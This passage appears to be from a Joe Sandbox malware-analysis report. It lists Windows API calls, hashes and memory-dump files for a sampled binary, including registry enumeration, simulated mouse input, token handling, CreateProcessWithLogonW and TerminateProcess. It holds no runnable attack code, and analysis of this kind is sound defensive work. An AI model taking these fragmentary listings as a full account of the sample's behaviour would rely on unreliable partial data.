                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                          • String ID: RoUninitialize$combase.dll
                                                          • API String ID: 3489934621-2819208100
                                                          • Opcode ID: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
                                                          • Instruction ID: e44d5e30d74244cf066a6f0790b4978c2b37953b306b7a34a8413ee089e193c6
                                                          • Opcode Fuzzy Hash: 5b1f5e770d6cd72e13dcdb83062702aceafbf81200ab837ab072775ae4168e0a
                                                          • Instruction Fuzzy Hash: D0E012B4681304EFEA32AF60EC49B623AB8B704743F504238F611E90E0CFBA4211CB08
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: _memmove$__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 3253778849-0
                                                          • Opcode ID: 3f374972b687e86cf07dd6252ac37afda97c21d99c549dcfd7a09bd50f8996f7
                                                          • Instruction ID: b0f60ba9f542841947e6e5bd083712e90b64b5818952ae5d395d147d10a55f3c
                                                          • Opcode Fuzzy Hash: 3f374972b687e86cf07dd6252ac37afda97c21d99c549dcfd7a09bd50f8996f7
                                                          • Instruction Fuzzy Hash: DD617A30500A5A9BCF07EF64CC82FFE37A9AF09308F448559F9599B296DB34AD15CB50
                                                          APIs
                                                            • Part of subcall function 00367DE1: _memmove.LIBCMT ref: 00367E22
                                                            • Part of subcall function 003E0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003DFDAD,?,?), ref: 003E0E31
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E02BD
                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 003E02FD
                                                          • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 003E0320
                                                          • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 003E0349
                                                          • RegCloseKey.ADVAPI32(?,?,00000000), ref: 003E038C
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003E0399
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                          • String ID:
                                                          • API String ID: 4046560759-0
                                                          • Opcode ID: bf89ad03a23cfd144dac9dd02f058d53892ab49e41871162a964abe10d652bb7
                                                          • Instruction ID: f43f1b7c2a427046508181bb61a77da8260fedc16622e610fc9158961c8ceb92
                                                          • Opcode Fuzzy Hash: bf89ad03a23cfd144dac9dd02f058d53892ab49e41871162a964abe10d652bb7
                                                          • Instruction Fuzzy Hash: 68516A311082409FC716EF64C885E6FBBE8FF84314F448A2DF5858B2A2DB71E945CB52
                                                          APIs
                                                          • GetMenu.USER32(?), ref: 003E57FB
                                                          • GetMenuItemCount.USER32(00000000), ref: 003E5832
                                                          • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 003E585A
                                                          • GetMenuItemID.USER32(?,?), ref: 003E58C9
                                                          • GetSubMenu.USER32(?,?), ref: 003E58D7
                                                          • PostMessageW.USER32(?,00000111,?,00000000), ref: 003E5928
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountMessagePostString
                                                          • String ID:
                                                          • API String ID: 650687236-0
                                                          • Opcode ID: 0a12202839ea84071348fade4a0fa7ef57b47fc8b69340be3b6bb002fea12161
                                                          • Instruction ID: 376637d308939df76eff2d45445ad3ec6e736ae1a0584d38fe2fc9918a531308
                                                          • Opcode Fuzzy Hash: 0a12202839ea84071348fade4a0fa7ef57b47fc8b69340be3b6bb002fea12161
                                                          • Instruction Fuzzy Hash: CB516035E00665EFCF16EF65C885AAEB7B8EF48314F114169E815BB391CB70AE41CB90
                                                          APIs
                                                          • VariantInit.OLEAUT32(?), ref: 003BEF06
                                                          • VariantClear.OLEAUT32(00000013), ref: 003BEF78
                                                          • VariantClear.OLEAUT32(00000000), ref: 003BEFD3
                                                          • _memmove.LIBCMT ref: 003BEFFD
                                                          • VariantClear.OLEAUT32(?), ref: 003BF04A
                                                          • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 003BF078
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Variant$Clear$ChangeInitType_memmove
                                                          • String ID:
                                                          • API String ID: 1101466143-0
                                                          • Opcode ID: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
                                                          • Instruction ID: fe1457a67525b357c3e8dd48b46b6a4490dfdc1e769b777f534c4291820ceb33
                                                          • Opcode Fuzzy Hash: 329dbd5deb07ed2b958d0100f8b80dac71aa2c71eec8f3ed39e75a9e67e90a4a
                                                          • Instruction Fuzzy Hash: 4C5169B5A00209EFCB15DF58C880AAAB7B8FF4C314F158569EA59DB351E734E911CFA0
                                                          APIs
                                                          • _memset.LIBCMT ref: 003C2258
                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003C22A3
                                                          • IsMenu.USER32(00000000), ref: 003C22C3
                                                          • CreatePopupMenu.USER32 ref: 003C22F7
                                                          • GetMenuItemCount.USER32(000000FF), ref: 003C2355
                                                          • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003C2386
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                          • String ID:
                                                          • API String ID: 3311875123-0
                                                          • Opcode ID: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
                                                          • Instruction ID: 633833ce3c366303f943b26b4b28d27779f17fd286865f0e4855e4f95eb07f53
                                                          • Opcode Fuzzy Hash: 3da28aaeb3da9240eb76496d22ceddc57c4d0b93888eaf29321615804d4e6611
                                                          • Instruction Fuzzy Hash: F2518938600289DFDF22DF68C988FAEBBE9AF45314F15422DE851EB290D3B49D04CB51
                                                          APIs
                                                            • Part of subcall function 00362612: GetWindowLongW.USER32(?,000000EB), ref: 00362623
                                                          • BeginPaint.USER32(?,?,?,?,?,?), ref: 0036179A
                                                          • GetWindowRect.USER32(?,?), ref: 003617FE
                                                          • ScreenToClient.USER32(?,?), ref: 0036181B
                                                          • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0036182C
                                                          • EndPaint.USER32(?,?), ref: 00361876
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                          • String ID:
                                                          • API String ID: 1827037458-0
                                                          • Opcode ID: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
                                                          • Instruction ID: f13bf356fc92b306ac1ec25446765a32ebef41057564b61109611ed93340306e
                                                          • Opcode Fuzzy Hash: 54c5512ea323c71233c823316bfced374e2a8b8f7b5004893842d45bc1ed0f29
                                                          • Instruction Fuzzy Hash: 7841B2302047409FDB22DF25DCC4FB67BE8FB4A724F188669F5958B2A1C7B09845DB61
                                                          APIs
                                                          • ShowWindow.USER32(004257B0,00000000,00E0CFA0,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB712
                                                          • EnableWindow.USER32(00000000,00000000), ref: 003EB736
                                                          • ShowWindow.USER32(004257B0,00000000,00E0CFA0,?,?,004257B0,?,003EB5A8,?,?), ref: 003EB796
                                                          • ShowWindow.USER32(00000000,00000004,?,003EB5A8,?,?), ref: 003EB7A8
                                                          • EnableWindow.USER32(00000000,00000001), ref: 003EB7CC
                                                          • SendMessageW.USER32(?,0000130C,?,00000000), ref: 003EB7EF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$Show$Enable$MessageSend
                                                          • String ID:
                                                          • API String ID: 642888154-0
                                                          • Opcode ID: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
                                                          • Instruction ID: b1698ae8da1bd7ec1eaa94a5c7bbe782f7ca85e48e75a106cbec804c8f3c9690
                                                          • Opcode Fuzzy Hash: c6e35b6ae0b2d069b458a409a2137fb600dc492a1922b0c8683a6b4a2f74b9ed
                                                          • Instruction Fuzzy Hash: CE417434600190EFDB23CF25C499B96BBE1FF45350F1942B9E9488FAE2C771A856CB51
                                                          APIs
                                                          • GetForegroundWindow.USER32(?,?,?,?,?,?,003D4E41,?,?,00000000,00000001), ref: 003D70AC
                                                            • Part of subcall function 003D39A0: GetWindowRect.USER32(?,?), ref: 003D39B3
                                                          • GetDesktopWindow.USER32 ref: 003D70D6
                                                          • GetWindowRect.USER32(00000000), ref: 003D70DD
                                                          • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003D710F
                                                            • Part of subcall function 003C5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003C52BC
                                                          • GetCursorPos.USER32(?), ref: 003D713B
                                                          • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D7199
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                          • String ID:
                                                          • API String ID: 4137160315-0
                                                          • Opcode ID: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
                                                          • Instruction ID: c8b6390cb8ae7e0cc9519bc97712139bd10db2aaad616d56205ee07021fe3318
                                                          • Opcode Fuzzy Hash: 0ab3bdb8a480ce39e258adfb2652791f0753abe95ab407b985e2a2f09e124e19
                                                          • Instruction Fuzzy Hash: A531D272509345AFD721DF14D849F9BB7EAFF88314F000A1AF5859B291DB70EA09CB92
                                                          APIs
                                                            • Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003B80C0
                                                            • Part of subcall function 003B80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003B80CA
                                                            • Part of subcall function 003B80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003B80D9
                                                            • Part of subcall function 003B80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003B80E0
                                                            • Part of subcall function 003B80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003B80F6
                                                          • GetLengthSid.ADVAPI32(?,00000000,003B842F), ref: 003B88CA
                                                          • GetProcessHeap.KERNEL32(00000008,00000000), ref: 003B88D6
                                                          • HeapAlloc.KERNEL32(00000000), ref: 003B88DD
                                                          • CopySid.ADVAPI32(00000000,00000000,?), ref: 003B88F6
                                                          • GetProcessHeap.KERNEL32(00000000,00000000,003B842F), ref: 003B890A
                                                          • HeapFree.KERNEL32(00000000), ref: 003B8911
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                          • String ID:
                                                          • API String ID: 3008561057-0
                                                          • Opcode ID: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
                                                          • Instruction ID: c15c16592f19b227645741f9740745fe5dc1f7e9608f5a3861fb1e2a355cef91
                                                          • Opcode Fuzzy Hash: 3c8d918262a95e11e5eca19e3aa7990a29b3885820f55ca451f903e554f24c40
                                                          • Instruction Fuzzy Hash: 43119D71601209FFDF229BA4DC49BFE7BACEB45319F108128E945DB550CB729E04DB60
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003B85E2
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 003B85E9
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003B85F8
                                                          • CloseHandle.KERNEL32(00000004), ref: 003B8603
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003B8632
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 003B8646
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
                                                          • Instruction ID: b2f48b198dd0c577223b71ba2e58231e82b4875b15cb0dcf4cd9add0beddf8f3
                                                          • Opcode Fuzzy Hash: 8c33b76b0f899e110edfd8e740d00be50bdfe1c5711db796e51fd4390bed5a9c
                                                          • Instruction Fuzzy Hash: FF113A72501149AFDF12CFA4DD88AEE7BADEF48348F054165FA05A61A0C7718E64EB20
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 003BB7B5
                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 003BB7C6
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003BB7CD
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 003BB7D5
                                                          • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003BB7EC
                                                          • MulDiv.KERNEL32(000009EC,?,?), ref: 003BB7FE
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CapsDevice$Release
                                                          • String ID:
                                                          • API String ID: 1035833867-0
                                                          • Opcode ID: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
                                                          • Instruction ID: 5a6c3af0f42d9ba041674d840e9cbb2675bf0f48277c5bcfa2c9db7ee0af54fc
                                                          • Opcode Fuzzy Hash: 110cd338cedde17b8aa07cac410d8a830018badfe3c83cae0fc089fff9f78daf
                                                          • Instruction Fuzzy Hash: 9C018875E00249FFEB115BA69C85A5EBFBCEF48311F004175FA04AB291DA719D00CF51
                                                          APIs
                                                          • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00380193
                                                          • MapVirtualKeyW.USER32(00000010,00000000), ref: 0038019B
                                                          • MapVirtualKeyW.USER32(000000A0,00000000), ref: 003801A6
                                                          • MapVirtualKeyW.USER32(000000A1,00000000), ref: 003801B1
                                                          • MapVirtualKeyW.USER32(00000011,00000000), ref: 003801B9
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 003801C1
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Virtual
                                                          • String ID:
                                                          • API String ID: 4278518827-0
                                                          • Opcode ID: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
                                                          • Instruction ID: be299c1bf68662e3222b418616f309ab265967ace5dca6e90feca8e1ff6e2c04
                                                          • Opcode Fuzzy Hash: 7d9aee579bf85c9785d2a99fdb6754be86cc6ae6583e36400bf1829b534da787
                                                          • Instruction Fuzzy Hash: A7016CB09017597DE3008F5A8C85B52FFA8FF19354F00411BA15C4B941C7F5A864CBE5
                                                          APIs
                                                          • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003C53F9
                                                          • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003C540F
                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 003C541E
                                                          • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C542D
                                                          • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C5437
                                                          • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C543E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                          • String ID:
                                                          • API String ID: 839392675-0
                                                          • Opcode ID: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
                                                          • Instruction ID: d8f8a611580c1a6375e0c188c4f2ff88865d0be936c4f5ce4c5d10b6ff2b2c85
                                                          • Opcode Fuzzy Hash: d8969d4662ba8801b5d5db573662c42ab4dc84dfbbb9df1162af396cf14e9b12
                                                          • Instruction Fuzzy Hash: 0DF01D32241598BFE7325BA29C4EEAB7B7CEBC6B11F000269FA04D50D197E11A0186B5
                                                          APIs
                                                          • InterlockedExchange.KERNEL32(?,?), ref: 003C7243
                                                          • EnterCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7254
                                                          • TerminateThread.KERNEL32(00000000,000001F6,?,00370EE4,?,?), ref: 003C7261
                                                          • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00370EE4,?,?), ref: 003C726E
                                                            • Part of subcall function 003C6C35: CloseHandle.KERNEL32(00000000,?,003C727B,?,00370EE4,?,?), ref: 003C6C3F
                                                          • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C7281
                                                          • LeaveCriticalSection.KERNEL32(?,?,00370EE4,?,?), ref: 003C7288
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_360000_aBEh0fsi2c.jbxd
                                                          Similarity
                                                          • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                          • String ID:
                                                          • API String ID: 3495660284-0
                                                          • Opcode ID: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
                                                          • Instruction ID: 8bcc5ef57a53276aa1f82857bede745d1b0fd117c980d016d6526de025309ac2
                                                          • Opcode Fuzzy Hash: 5dcd690cfa5e0869155a159ffaca1f318c18183fec779dc06d93bf1932f7d4b9
                                                          • Instruction Fuzzy Hash: D3F03A3A540652AFD7231B64ED8CAEA773DEF45702F110A35F602990E0CBB65901CB50
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 003B899D
                                                          • UnloadUserProfile.USERENV(?,?), ref: 003B89A9
                                                          • CloseHandle.KERNEL32(?), ref: 003B89B2
                                                          • CloseHandle.KERNEL32(?), ref: 003B89BA
                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003B89C3
                                                          • HeapFree.KERNEL32(00000000), ref: 003B89CA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1336771467.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                          • Associated: 00000000.00000002.1336758325.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.00000000003EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336849316.0000000000414000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1336999850.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1337053292.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
